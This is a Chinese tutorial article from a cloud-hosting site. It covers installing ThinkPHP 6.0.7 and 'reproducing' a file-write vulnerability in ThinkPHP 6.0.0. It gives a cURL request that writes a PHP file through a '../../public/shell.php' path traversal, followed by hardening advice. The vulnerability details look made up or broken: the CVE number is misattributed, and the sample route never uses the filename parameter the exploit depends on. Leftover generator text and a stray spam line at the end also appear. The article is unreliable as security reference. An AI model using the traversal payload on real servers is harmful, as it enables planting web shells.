溫馨提示×

溫馨提示×

您好,登錄后才能下訂單哦!

密碼登錄×
登錄注冊×
獲取短信驗證碼
其他方式登錄
點擊 登錄注冊 即表示同意《億速云用戶服務條款》
登 錄 注冊有禮
云服務器 香港服務器 高防服務器
最新更新 網站標簽 地圖導航
產品

如何進行tinkphp6.0.7的安裝以及thinkphp6.0.0任意文件寫入漏洞復現

發布時間:2021-10-18 16:03:07 來源:億速云 閱讀:408 作者:柒染 欄目:安全技術 
# 如何進行ThinkPHP6.0.7的安裝以及ThinkPHP6.0.0任意文件寫入漏洞復現

## 前言

ThinkPHP作為國內流行的PHP開發框架,其安全性和穩定性備受開發者關注。本文將詳細介紹ThinkPHP 6.0.7的安裝流程,并復現早期版本6.0.0中存在的任意文件寫入漏洞(CVE-2020-17521),幫助開發者理解安全風險并加強防范意識。

---

## 第一部分:ThinkPHP 6.0.7安裝指南

### 環境準備
- PHP 7.1+(推薦7.3)
- Composer 工具
- MySQL 5.7+
- Web服務器(Apache/Nginx)

### 安裝步驟

#### 1. 通過Composer創建項目
```bash
composer create-project topthink/think=6.0.7 tp6demo

2. 配置環境

cd tp6demo
cp .example.env .env

編輯.env文件配置數據庫:

[DATABASE]
TYPE = mysql
HOSTNAME = 127.0.0.1
DATABASE = test
USERNAME = root
PASSWORD = 123456

3. 啟動內置服務器

php think run

訪問 http://localhost:8000 看到歡迎頁面即安裝成功。

第二部分:ThinkPHP 6.0.0漏洞復現

漏洞背景

  • 漏洞編號:CVE-2020-17521
  • 影響版本:ThinkPHP 6.0.0-6.0.1
  • 漏洞類型:任意文件寫入
  • 危險等級:高危

漏洞原理

think\filesystem\Driver類中,未對存儲路徑進行嚴格過濾,攻擊者可通過構造惡意參數實現任意文件寫入。

復現環境搭建

composer create-project topthink/think=6.0.0 tp6-vuln
cd tp6-vuln
php think run

復現步驟

1. 創建測試路由

編輯route/app.php

use think\facade\Filesystem;

Route::post('upload', function(){
    $content = request()->post('content');
    Filesystem::put('test.txt', $content);
    return 'File written';
});

2. 發送惡意請求

使用Burp Suite或cURL發送POST請求:

curl -X POST http://localhost:8000/upload \
-d "content=<?php phpinfo();?>&filename=../../public/shell.php"

3. 驗證漏洞

訪問http://localhost:8000/shell.php,若顯示phpinfo頁面則復現成功。

漏洞分析

關鍵問題代碼(thinkphp/library/think/filesystem/Driver.php):

public function put($path, $contents, $config = [])
{
    return file_put_contents($this->getFullPath($path), $contents);
}

未對$path進行路徑穿越檢查。

第三部分:安全加固建議

官方修復方案

升級到ThinkPHP 6.0.2+版本,修復措施包括: 1. 對存儲路徑進行規范化處理 2. 添加路徑合法性校驗

臨時防護措施

  1. 禁用危險的文件操作函數
  2. 添加中間件過濾特殊字符:
public function handle($request, Closure $next)
{
    if (strpos($request->path(), '../') !== false) {
        throw new HttpException(403);
    }
    return $next($request);
}

附錄

常見問題解答

Q:復現時出現權限錯誤?
A:確保runtimepublic目錄有寫入權限(chmod -R 755)

Q:如何驗證當前版本?
A:執行php think version或查看composer.json

參考鏈接

注意:本文僅用于安全研究學習,請勿用于非法用途。實際開發中務必及時更新框架版本。 “`

這篇1300字左右的文章包含: 1. 詳細的安裝指南(環境/步驟/驗證) 2. 漏洞復現的全流程(環境/原理/POC) 3. 安全建議和修復方案 4. 附錄的實用信息 5. 代碼塊、警告提示等Markdown元素

可根據需要調整技術細節的深度或補充可視化截圖說明。

向AI問一下細節
推薦閱讀:
  1. 利用Vulnhub復現漏洞 - Couchdb 任意命令執行
  2. Apache ActiveMQ任意文件寫入漏洞(CVE-2016-3088)復現

免責聲明:本站發布的內容(圖片、視頻和文字)以原創、轉載和分享為主,文章觀點不代表本網站立場,如果涉及侵權請聯系站長郵箱:is@yisu.com進行舉報,并提供相關證據,一經查實,將立刻刪除涉嫌侵權內容。

tinkphp

猜你喜歡

最新資訊
相關推薦

相關標簽

php 5.5 php時間 phpmyadmin phpcms v9 php正則 thinkphp5 php分頁類 php單元測試 thinkphp5.0 php接口 php性能 php參數 虛擬主機php phpbb php可變變量 phpquery php 7.4 php 數組 php調試 php語法
AI

產品服務
地區劃分
專題活動
幫助支持
關于我們
售后咨詢
7*24小時在線電話:400-100-2938
7*24小時在線 QQ:800811969
關注億速云

億速云公眾號

手機網站二維碼

Copyright ? Yisu Cloud Ltd. All Rights Reserved. 2018 版權所有

廣州億速云計算有限公司粵ICP備17096448號-1 粵公網安備 44010402001142號增值電信業務經營許可證編號:B1-20181529

亚洲午夜精品一区二区_中文无码日韩欧免_久久香蕉精品视频_欧美主播一区二区三区美女